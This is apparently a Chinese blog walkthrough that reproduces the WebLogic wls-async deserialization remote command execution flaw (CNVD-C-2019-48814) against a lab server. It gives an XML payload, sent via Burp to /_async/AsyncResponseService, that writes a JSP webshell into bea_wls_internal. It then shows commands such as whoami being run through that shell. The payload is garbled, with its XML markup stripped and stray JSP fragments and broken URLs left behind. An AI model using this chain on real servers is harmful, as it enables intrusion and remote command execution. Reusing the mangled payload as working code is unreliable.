WebLogic wls-async 反序列化远程命令执行漏洞(CNVD-C-2019-48814)

一,防御简述:

跟该漏洞存在于wls9-async组件,这个组件主要作用是异步通讯服务,攻击者可以向/ _async / AsyncResponseService路径下构造良好的xml格式的数据,并保存在数据中的服务器端反序列化时,执行其中的恶意代码,从而可以getshell。

影响版本:

Oracle WebLogic Server的10.3.6.0.0

Oracle WebLogic Server的12.1.3.0.0

Oracle WebLogic Server的12.2.1.1.0

Oracle WebLogic Server的12.2.1.2.0

二,环境建设

 靶机:windows server 2008 R2:构建weblogic服务器

三,漏洞复现

访问:  http:// your-ip:7001 / _async / AsyncResponseService

WebLogic wls-async 反序列化远程命令执行漏洞(CNVD-C-2019-48814)_第1张图片
payload:

	
	xxxx
	
	
	
	servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/webshell.jsp
	");          
	while((a=in.read(b))!=-1){
	out.println(new String(b));          
	}
	out.print("");
}
%>]]>

burp抓包,发送到repeater
将GET替换POST,然后修改内容类型为text / xml

WebLogic wls-async 反序列化远程命令执行漏洞(CNVD-C-2019-48814)_第2张图片

go一下,查看返回值,我们的webshel​​l.jsp已经上传完毕

WebLogic wls-async 反序列化远程命令执行漏洞(CNVD-C-2019-48814)_第3张图片

 访问:http://192.168.15.89:7001 / bea_wls_internal / webshel​​l.jsp?pwd = 123&cmd = whoami
  获取用户,这里通过传输cmd命令,查询信息

WebLogic wls-async 反序列化远程命令执行漏洞(CNVD-C-2019-48814)_第4张图片

 上传文件

Content-Type: text/xml
Content-Length: 714
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20191129103954316.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L292b3dvdm8=,size_16,color_FFFFFF,t_70)
xxxxservers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/sh.jsp





这个时候你上传的文件sh.jsp内容为456就会上传到下面的目录里面

l http:// ip:port / bea_wls_internal / sh.jsp

成功后,查看写入的文件

————————————————
推荐行业大佬------Stephen Wolf
原文链接:https://blog.csdn.net/qq_45625605/article/details/103215894

你可能感兴趣的:(反序列化)